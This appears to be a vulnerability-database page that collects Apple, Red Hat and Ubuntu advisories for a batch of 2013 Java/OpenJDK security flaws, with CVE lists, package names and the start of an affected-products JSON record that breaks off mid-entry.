For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6update17.dmg Its SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08
For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX2013-005.dmg Its SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3 Lzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0 TmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm D4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u jZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr +KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM 1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8 vCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh +ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW 2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8 Ooi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy Los4PbyC//yRidZKynqx =I3n5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security update Advisory ID: RHSA-2013:1505-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1505.html Issue date: 2013-11-05 CVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5790 CVE-2013-5797 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5814 CVE-2013-5817 CVE-2013-5820 CVE-2013-5823 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5840 CVE-2013-5842 CVE-2013-5849 CVE-2013-5850 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. (CVE-2013-5809)
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. (CVE-2013-5804, CVE-2013-5797)
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341) 1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081) 1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675) 1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299) 1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071) 1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277) 1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071) 1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349) 1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505) 1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102) 1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093) 1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291) 1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510) 1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287) 1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157) 1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739) 1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987) 1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196) 1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425) 1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653) 1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029) 1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744) 1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530) 1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290) 1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743) 1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-3829.html https://www.redhat.com/security/data/cve/CVE-2013-4002.html https://www.redhat.com/security/data/cve/CVE-2013-5772.html https://www.redhat.com/security/data/cve/CVE-2013-5774.html https://www.redhat.com/security/data/cve/CVE-2013-5778.html https://www.redhat.com/security/data/cve/CVE-2013-5780.html https://www.redhat.com/security/data/cve/CVE-2013-5782.html https://www.redhat.com/security/data/cve/CVE-2013-5783.html https://www.redhat.com/security/data/cve/CVE-2013-5784.html https://www.redhat.com/security/data/cve/CVE-2013-5790.html https://www.redhat.com/security/data/cve/CVE-2013-5797.html https://www.redhat.com/security/data/cve/CVE-2013-5802.html https://www.redhat.com/security/data/cve/CVE-2013-5803.html https://www.redhat.com/security/data/cve/CVE-2013-5804.html https://www.redhat.com/security/data/cve/CVE-2013-5809.html https://www.redhat.com/security/data/cve/CVE-2013-5814.html https://www.redhat.com/security/data/cve/CVE-2013-5817.html https://www.redhat.com/security/data/cve/CVE-2013-5820.html https://www.redhat.com/security/data/cve/CVE-2013-5823.html https://www.redhat.com/security/data/cve/CVE-2013-5825.html https://www.redhat.com/security/data/cve/CVE-2013-5829.html https://www.redhat.com/security/data/cve/CVE-2013-5830.html https://www.redhat.com/security/data/cve/CVE-2013-5840.html https://www.redhat.com/security/data/cve/CVE-2013-5842.html https://www.redhat.com/security/data/cve/CVE-2013-5849.html https://www.redhat.com/security/data/cve/CVE-2013-5850.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSeT/AXlSAg2UNWIIRAvBKAJ9vGve+1MyOR8lyLQffhBtOlcmxrgCfVKad ebAHvPvYFmwsG11PQeLu+bI= =+ckf -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2033-1 November 21, 2013
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description: - openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)
Several vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)
Several vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.12.04.4 icedtea-6-jre-jamvm 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.12.04.4
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.10.04.4
This update uses a new upstream release, which includes additional bug fixes. (CVE-2013-5803)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0372", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.1.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.1.4" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.1.3" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.2.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.2.4" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.1.5" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.2.3" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.2.5" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.2.6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus client version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.3" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r28.2.8" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.4" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.2" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": 